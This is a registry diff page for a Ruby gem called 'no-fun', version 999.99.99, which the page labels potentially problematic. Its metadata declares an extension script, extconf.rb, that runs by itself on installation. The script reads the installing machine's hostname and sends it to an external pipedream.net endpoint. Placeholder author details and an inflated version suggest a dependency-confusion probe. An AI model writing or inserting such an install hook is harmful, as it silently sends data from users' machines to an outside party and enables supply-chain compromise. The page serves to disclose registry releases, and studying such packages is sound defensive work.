no-fun 999.99.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of no-fun might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/no-fun/extconf.rb +9 -0
  3. metadata +45 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: bd9c0dde414d597c4710519128cd06aa6b6fa97c56423a21e35d3c82aa74613e
4
+ data.tar.gz: 7d427c5fecc358b882f8da97e9e72ca3b8b0767257adb1144bbb1f60a0abcb7e
5
+ SHA512:
6
+ metadata.gz: f171ee2116de0072160ddaaa108f0c6aa805ef7e62aecdde844e8f2cee1fb5dca5e89c93717f0350c6421f0111e9cc20c1910c08b4ff68646888d7a0051c15cc
7
+ data.tar.gz: 70b13423169fa2f05db7f083bb03c6d4e62d563cb3ac9eecda67e0018597d3b97aad300e7cf4f545f890fc94ed9f2937812390fdad447ad641ff81095cf1c9ff
@@ -0,0 +1,9 @@
1
+ require "net/http"
2
+ require "uri"
3
+ require 'socket'
4
+
5
+ packages = 'no-fun'
6
+ h = Socket.gethostname
7
+ uri = URI("https://eo8f3m3ho26a0nm.m.pipedream.net/elastic/#{URI.encode_www_form_component(packages)}/?h=#{h}")
8
+ Net::HTTP.get_response(uri)
9
+
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: no-fun
3
+ version: !ruby/object:Gem::Version
4
+ version: 999.99.99
5
+ platform: ruby
6
+ authors:
7
+ - test
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-09-22 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description:
14
+ email:
15
+ - test@example.com
16
+ executables: []
17
+ extensions:
18
+ - ext/no-fun/extconf.rb
19
+ extra_rdoc_files: []
20
+ files:
21
+ - ext/no-fun/extconf.rb
22
+ homepage: https://example.com
23
+ licenses:
24
+ - MIT
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.4.19
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: Hodwy, testing.
45
+ test_files: []